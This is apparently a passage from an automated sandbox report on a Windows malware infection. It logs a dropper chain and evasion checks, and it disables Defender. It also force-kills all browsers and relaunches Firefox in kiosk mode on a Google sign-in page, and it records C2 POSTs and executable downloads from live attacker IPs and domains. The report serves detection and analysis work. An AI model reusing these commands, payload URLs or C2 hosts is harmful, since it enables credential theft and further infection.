        Suspicious use of SendNotifyMessage
        Suspicious use of WriteProcessMemory
        
        PID:4836
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM firefox.exe /T
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4772
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM chrome.exe /T
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1592
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM msedge.exe /T
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4924
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM opera.exe /T
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4620
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM brave.exe /T
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3112
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
        7⤵
        
        PID:3416
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
        8⤵
        Checks processor information in registry
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of SetWindowsHookEx
        
        PID:3524
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2012 -parentBuildID 20240401114208 -prefsHandle 1920 -prefMapHandle 1912 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {02d52b29-747a-4ce7-bb5f-e416e8ddc916} 3524 "\\.\pipe\gecko-crash-server-pipe.3524" gpu
        9⤵
        
        PID:4624
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2480 -parentBuildID 20240401114208 -prefsHandle 2472 -prefMapHandle 2460 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {baba7b08-c019-4c12-ba76-e5b3a7bc7b35} 3524 "\\.\pipe\gecko-crash-server-pipe.3524" socket
        9⤵
        
        PID:3992
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2772 -childID 1 -isForBrowser -prefsHandle 3224 -prefMapHandle 2968 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 924 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e6b6c773-fec5-46fb-bba4-66b3573bf358} 3524 "\\.\pipe\gecko-crash-server-pipe.3524" tab
        9⤵
        
        PID:1484
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3940 -childID 2 -isForBrowser -prefsHandle 3908 -prefMapHandle 3904 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 924 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b83ef54b-e711-400f-8d5d-51d4e4a94eb3} 3524 "\\.\pipe\gecko-crash-server-pipe.3524" tab
        9⤵
        
        PID:1768
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4476 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4564 -prefMapHandle 4560 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {91d8f691-c1fe-4f74-8341-77f11ffedd68} 3524 "\\.\pipe\gecko-crash-server-pipe.3524" utility
        9⤵
        Checks processor information in registry
        
        PID:6500
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5192 -childID 3 -isForBrowser -prefsHandle 5208 -prefMapHandle 5200 -prefsLen 26944 -prefMapSize 244658 -jsInitHandle 924 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {508ed6b7-1ada-4a5c-bed5-b1d75b888bd6} 3524 "\\.\pipe\gecko-crash-server-pipe.3524" tab
        9⤵
        
        PID:7000
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5232 -childID 4 -isForBrowser -prefsHandle 5352 -prefMapHandle 5356 -prefsLen 26944 -prefMapSize 244658 -jsInitHandle 924 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0e1aaec9-91b2-4eab-88be-c9e847a9e2e3} 3524 "\\.\pipe\gecko-crash-server-pipe.3524" tab
        9⤵
        
        PID:7092
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5624 -childID 5 -isForBrowser -prefsHandle 5544 -prefMapHandle 5548 -prefsLen 26944 -prefMapSize 244658 -jsInitHandle 924 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {784a43c1-049e-47c6-85fc-1e24d1569e33} 3524 "\\.\pipe\gecko-crash-server-pipe.3524" tab
        9⤵
        
        PID:7104
  - - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2g5323.exe
      C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2g5323.exe
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:1384
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3d69R.exe
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3d69R.exe
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:2720
- C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\4L684S.exe
  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\4L684S.exe
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Windows security modification
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3360

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3288

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2900

Network

DNS

8.8.8.8.in-addr.arpa

Remote address:

8.8.8.8:53

Request

8.8.8.8.in-addr.arpa

IN PTR

Response

8.8.8.8.in-addr.arpa

IN PTR

dnsgoogle
DNS

58.55.71.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

58.55.71.13.in-addr.arpa

IN PTR

Response
DNS

90.210.23.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

90.210.23.2.in-addr.arpa

IN PTR

Response

90.210.23.2.in-addr.arpa

IN PTR

a2-23-210-90deploystaticakamaitechnologiescom
DNS

atten-supporse.biz

f3745b045c.exe

Remote address:

8.8.8.8:53

Request

atten-supporse.biz

IN A

Response

atten-supporse.biz

IN A

104.21.96.1

atten-supporse.biz

IN A

104.21.16.1

atten-supporse.biz

IN A

104.21.64.1

atten-supporse.biz

IN A

104.21.112.1

atten-supporse.biz

IN A

104.21.48.1

atten-supporse.biz

IN A

104.21.80.1

atten-supporse.biz

IN A

104.21.32.1
POST

https://atten-supporse.biz/api

2g5323.exe

Remote address:

104.21.96.1:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: atten-supporse.biz

Response

HTTP/1.1 200 OK

Date: Tue, 10 Dec 2024 19:47:22 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=p3prmk69gnhourrf473igrlq19; expires=Sat, 05-Apr-2025 13:34:01 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WJWMCU1OJlDXMIjn%2B7Wyot8xfnZNa5GgzamayBySplnGUhHpFMzMWs8SP0%2FDf%2FCLR39ggt76Zoz7pGZzoh1x53lvm1T5gxTBRLBaaDJ0THwX0Yp7t61SGj5BLVj%2FGmXLQZHh7Ng%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8effbf0e5ecb7708-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=61534&min_rtt=60535&rtt_var=24700&sent=9&recv=9&lost=0&retrans=3&sent_bytes=6352&recv_bytes=609&delivery_rate=19800&cwnd=250&unsent_bytes=0&cid=92ea845424aacb63&ts=743&x=0"
DNS

138.32.126.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

138.32.126.40.in-addr.arpa

IN PTR

Response
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
DNS

1.96.21.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

1.96.21.104.in-addr.arpa

IN PTR

Response
DNS

se-blurry.biz

f3745b045c.exe

Remote address:

8.8.8.8:53

Request

se-blurry.biz

IN A

Response
DNS

zinc-sneark.biz

f3745b045c.exe

Remote address:

8.8.8.8:53

Request

zinc-sneark.biz

IN A

Response
DNS

dwell-exclaim.biz

f3745b045c.exe

Remote address:

8.8.8.8:53

Request

dwell-exclaim.biz

IN A

Response
DNS

formy-spill.biz

f3745b045c.exe

Remote address:

8.8.8.8:53

Request

formy-spill.biz

IN A

Response
DNS

covery-mover.biz

f3745b045c.exe

Remote address:

8.8.8.8:53

Request

covery-mover.biz

IN A

Response

covery-mover.biz

IN A

172.67.206.64

covery-mover.biz

IN A

104.21.58.186
POST

https://covery-mover.biz/api

2g5323.exe

Remote address:

172.67.206.64:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: covery-mover.biz

Response

HTTP/1.1 200 OK

Date: Tue, 10 Dec 2024 19:47:22 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=cp998734365gjeifb4citnmg2e; expires=Sat, 05-Apr-2025 13:34:01 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C%2Bz5mueI0688qRsfa5HiKGOcr5Cr9bTApfVoU2%2FOZWpMLilRvafLgmwfdnfjeQfzDOHMPcVjQT%2FzqC6B%2B%2B3d%2BjqbTJQxa31xoAWXkP7RkLLVsTzwYN0aAvt8fvfnnPzi9u6E"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8effbf12b9dbcd2a-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=60930&min_rtt=50434&rtt_var=16965&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3299&recv_bytes=605&delivery_rate=73823&cwnd=253&unsent_bytes=0&cid=f753dddbaae7542a&ts=261&x=0"
POST

http://185.215.113.43/Zu7JuNko/index.php

skotes.exe

Remote address:

185.215.113.43:80

Request

POST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 4
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 10 Dec 2024 19:47:22 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
POST

http://185.215.113.43/Zu7JuNko/index.php

skotes.exe

Remote address:

185.215.113.43:80

Request

POST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 158
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 10 Dec 2024 19:47:24 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.43/Zu7JuNko/index.php

skotes.exe

Remote address:

185.215.113.43:80

Request

POST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 10 Dec 2024 19:47:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.43/Zu7JuNko/index.php

skotes.exe

Remote address:

185.215.113.43:80

Request

POST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 10 Dec 2024 19:47:48 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.43/Zu7JuNko/index.php

skotes.exe

Remote address:

185.215.113.43:80

Request

POST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 10 Dec 2024 19:48:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.43/Zu7JuNko/index.php

skotes.exe

Remote address:

185.215.113.43:80

Request

POST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 10 Dec 2024 19:48:50 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.43/Zu7JuNko/index.php

skotes.exe

Remote address:

185.215.113.43:80

Request

POST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 10 Dec 2024 19:49:04 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.43/Zu7JuNko/index.php

skotes.exe

Remote address:

185.215.113.43:80

Request

POST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 10 Dec 2024 19:49:08 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.43/Zu7JuNko/index.php

skotes.exe

Remote address:

185.215.113.43:80

Request

POST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 10 Dec 2024 19:49:13 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.43/Zu7JuNko/index.php

skotes.exe

Remote address:

185.215.113.43:80

Request

POST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 10 Dec 2024 19:49:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
DNS

dare-curbys.biz

f3745b045c.exe

Remote address:

8.8.8.8:53

Request

dare-curbys.biz

IN A

Response
DNS

print-vexer.biz

f3745b045c.exe

Remote address:

8.8.8.8:53

Request

print-vexer.biz

IN A

Response
DNS

impend-differ.biz

f3745b045c.exe

Remote address:

8.8.8.8:53

Request

impend-differ.biz

IN A

Response
DNS

steamcommunity.com

f3745b045c.exe

Remote address:

8.8.8.8:53

Request

steamcommunity.com

IN A

Response

steamcommunity.com

IN A

23.214.143.155
DNS

64.206.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

64.206.67.172.in-addr.arpa

IN PTR

Response
DNS

43.113.215.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

43.113.215.185.in-addr.arpa

IN PTR

Response
GET

https://steamcommunity.com/profiles/76561199724331900

2g5323.exe

Remote address:

23.214.143.155:443

Request

GET /profiles/76561199724331900 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: steamcommunity.com

Response

HTTP/1.1 200 OK

Server: nginx
Content-Type: text/html; charset=UTF-8
Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Date: Tue, 10 Dec 2024 19:47:23 GMT
Content-Length: 35597
Connection: keep-alive
Set-Cookie: sessionid=f1f9687e2d2bfd788c53af89; Path=/; Secure; SameSite=None
Set-Cookie: steamCountry=GB%7C7d625a3b038bb98f68b4e14dac147806; Path=/; Secure; HttpOnly; SameSite=None
DNS

155.143.214.23.in-addr.arpa

Remote address:

8.8.8.8:53

Request

155.143.214.23.in-addr.arpa

IN PTR

Response

155.143.214.23.in-addr.arpa

IN PTR

a23-214-143-155deploystaticakamaitechnologiescom
GET

http://31.41.244.11/files/6904700471/Z9Pp9pM.exe

skotes.exe

Remote address:

31.41.244.11:80

Request

GET /files/6904700471/Z9Pp9pM.exe HTTP/1.1
Host: 31.41.244.11

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 10 Dec 2024 19:47:25 GMT
Content-Type: application/octet-stream
Content-Length: 2660864
Last-Modified: Tue, 10 Dec 2024 07:14:45 GMT
Connection: keep-alive
ETag: "6757ea65-289a00"
Accept-Ranges: bytes
GET

http://31.41.244.11/files/1521297942/H3tyh96.exe

skotes.exe

Remote address:

31.41.244.11:80

Request

GET /files/1521297942/H3tyh96.exe HTTP/1.1
Host: 31.41.244.11

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 10 Dec 2024 19:47:41 GMT
Content-Type: application/octet-stream
Content-Length: 1765888
Last-Modified: Tue, 10 Dec 2024 09:46:58 GMT
Connection: keep-alive
ETag: "67580e12-1af200"
Accept-Ranges: bytes
GET

http://31.41.244.11/files/8049824649/yiklfON.exe

skotes.exe

Remote address:

31.41.244.11:80

Request

GET /files/8049824649/yiklfON.exe HTTP/1.1
Host: 31.41.244.11

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 10 Dec 2024 19:47:49 GMT
Content-Type: application/octet-stream
Content-Length: 7736832
Last-Modified: Tue, 10 Dec 2024 17:03:36 GMT
Connection: keep-alive
ETag: "67587468-760e00"
Accept-Ranges: bytes
GET

http://31.41.244.11/files/523681048/3EUEYgl.exe

skotes.exe

Remote address:

31.41.244.11:80

Request

GET /files/523681048/3EUEYgl.exe HTTP/1.1
Host: 31.41.244.11

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 10 Dec 2024 19:48:34 GMT
Content-Type: application/octet-stream
Content-Length: 1850880
Last-Modified: Tue, 10 Dec 2024 17:55:01 GMT
Connection: keep-alive
ETag: "67588075-1c3e00"
Accept-Ranges: bytes
GET

http://31.41.244.11/files/unique2/random.exe

skotes.exe

Remote address:

31.41.244.11:80

Request

GET /files/unique2/random.exe HTTP/1.1
Host: 31.41.244.11

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 10 Dec 2024 19:48:51 GMT
Content-Type: application/octet-stream
Content-Length: 2012672
Last-Modified: Tue, 10 Dec 2024 17:32:14 GMT
Connection: keep-alive
ETag: "67587b1e-1eb600"
Accept-Ranges: bytes
DNS

11.244.41.31.in-addr.arpa

Remote address:

8.8.8.8:53

Request

11.244.41.31.in-addr.arpa

IN PTR

Response
GET

http://185.215.113.206/

3d69R.exe

Remote address:

185.215.113.206:80

Request

GET / HTTP/1.1
Host: 185.215.113.206
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Tue, 10 Dec 2024 19:47:25 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://185.215.113.206/c4becf79229cb002.php

3d69R.exe

Remote address:

185.215.113.206:80

Request

POST /c4becf79229cb002.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----DHDAFBFCFHIDAKFIIEBA
Host: 185.215.113.206
Content-Length: 211
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Tue, 10 Dec 2024 19:47:25 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 8
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
DNS

206.113.215.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

206.113.215.185.in-addr.arpa

IN PTR

Response
DNS

232.168.11.51.in-addr.arpa

Remote address:

8.8.8.8:53

Request

232.168.11.51.in-addr.arpa

IN PTR

Response
DNS

97.17.167.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

97.17.167.52.in-addr.arpa

IN PTR

Response
DNS

197.87.175.4.in-addr.arpa

Remote address:

8.8.8.8:53

Request

197.87.175.4.in-addr.arpa

IN PTR

Response
DNS

10.109.209.205.in-addr.arpa

Remote address:

8.8.8.8:53

Request

10.109.209.205.in-addr.arpa

IN PTR

Response
DNS

18.31.95.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

18.31.95.13.in-addr.arpa

IN PTR

Response
DNS

134.130.81.91.in-addr.arpa

Remote address:

8.8.8.8:53

Request

134.130.81.91.in-addr.arpa

IN PTR

Response
DNS

89.210.23.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

89.210.23.2.in-addr.arpa

IN PTR

Response

89.210.23.2.in-addr.arpa

IN PTR

a2-23-210-89deploystaticakamaitechnologiescom
DNS

fightlsoser.click

Z9Pp9pM.exe

Remote address:

8.8.8.8:53

Request

fightlsoser.click

IN A

Response

fightlsoser.click

IN A

172.67.213.48

fightlsoser.click

IN A

104.21.35.43
POST

https://fightlsoser.click/api

Z9Pp9pM.exe

Remote address:

172.67.213.48:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: fightlsoser.click

Response

HTTP/1.1 200 OK

Date: Tue, 10 Dec 2024 19:47:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=p4hqktjst4d198821698pgdapd; expires=Sat, 05-Apr-2025 13:34:35 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r0CFNuLN%2BxDQxesWJMs1h4iZtmfh95wDxscLdTdUiT%2Bv1QFoWBfDC0a3JtPk1q3TbQI6Lo8gbxTSB4qRzSUgDXQiypeYYc3PfGm6VsC2m0LqUR27Wosdk7NoZVS5vTP5AmIPHA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8effbfe1eedaef39-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=52300&min_rtt=47504&rtt_var=19128&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3301&recv_bytes=607&delivery_rate=74165&cwnd=236&unsent_bytes=0&cid=3a3bab4a226740da&ts=1287&x=0"
DNS

se-blurry.biz

f3745b045c.exe

Remote address:

8.8.8.8:53

Request

se-blurry.biz

IN A

Response
DNS

se-blurry.biz

f3745b045c.exe

Remote address:

8.8.8.8:53

Request

se-blurry.biz

IN A
DNS

48.213.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

48.213.67.172.in-addr.arpa

IN PTR

Response
DNS

zinc-sneark.biz

f3745b045c.exe

Remote address:

8.8.8.8:53

Request

zinc-sneark.biz

IN A

Response
DNS

dwell-exclaim.biz

f3745b045c.exe

Remote address:

8.8.8.8:53

Request

dwell-exclaim.biz

IN A

Response
DNS

formy-spill.biz

f3745b045c.exe

Remote address:

8.8.8.8:53

Request

formy-spill.biz

IN A

Response
POST

https://covery-mover.biz/api

Z9Pp9pM.exe

Remote address:

172.67.206.64:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: covery-mover.biz

Response

HTTP/1.1 200 OK

Date: Tue, 10 Dec 2024 19:47:58 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
